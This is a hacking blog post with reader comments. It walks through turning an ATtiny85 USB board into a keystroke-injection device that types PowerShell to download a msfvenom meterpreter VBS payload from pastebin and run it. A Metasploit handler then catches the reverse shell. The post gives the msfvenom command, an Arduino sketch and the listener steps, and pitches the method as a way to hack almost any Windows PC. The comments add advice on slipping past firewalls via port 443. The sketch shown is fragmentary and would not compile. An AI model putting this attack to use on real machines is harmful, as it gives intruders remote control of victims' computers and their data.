In the previous blog i have introduced what is a rubber ducky and how to use attiny85 as a rubber ducky. If you haven’t read that, you can check it out here. This is an arduino based chip with a low space available. We cant load a huge payload in to the flash memory. Here is a way to load the payload no matter how big it is. We have to make a payload using msfvenom and upload the code to pastebin. The ducky will load the script from the pastebin via the internet using powershell and execute it on the system. As soon as the script is executed, a meterpreter session will be pwned connect backs to the listener.

No more boring sessions, Just follow the steps.


Video Demo


step 1 : Create a payload

Use msfvenom to create a reverse_tcp payload. We should use VBS payload instead of EXE .

# msfvenom -p windows/meterpreter/reverse_tcp   -f vbs   –smallest  LHOST=“attacker ip”  LPORT=444 -o /root/Desktop/payload.txt


step 2: upload code to pastebin

Now open the file payload.txt from the desktop and copy the whole code. goto > click on “NEW PASTE” and paste the code, then click create paste. A new paste will be created. Note down the url somewhere, we need that in future.


step 3: Flashing Ducky

Attiny85 chip should be programmed to download raw code from pastebin and execute it. Use the script below. all you need to edit is the pastebin url  (line 20). Replace that “change_to_Your_url” . Make sure you are using “RAW” url. It should look something like this “” simply add “/raw/” in between.

after changing url compile and flash code using Arduino IDE to your chip. If you don,t know how to do that you must check my previous blog on 1$ rubber ducky preview .


#include "DigiKeyboard.h"

void setup() {

void loop() {
 int d=1000;
 // this is generally not necessary but with some older systems it seems to
 // prevent missing the first character after a delay:
 DigiKeyboard.print("$client = new-object System.Net.WebClient");
 DigiKeyboard.print("start Sys32Data.vbs");

step 4: setup handler

Setup reverse_tcp handler in msfconsole as we always do for metasploit based attacks.

# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…


step 5: Plug on target

Simplest of all, just plug in the attiny85 to the target system. with this method you hack almost any windows pc over LAN and WAN. Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.

Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you


Amal · June 3, 2017 at 12:22 pm

You said LAN or WAN. Won’t we need port forward setup to do it on WAN?

    susmith HCK · June 4, 2017 at 5:00 pm

    No its a reverse shell you dont have to forward port on target.

mr.robot · September 6, 2017 at 8:10 pm

Yes, you actually do…

    Jack · March 21, 2018 at 12:48 am

    No there is no reason for port forwarding. Use the common port which are usually not filtered on firewall or any other security device. I normally use 443 and never had a need to forward port.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.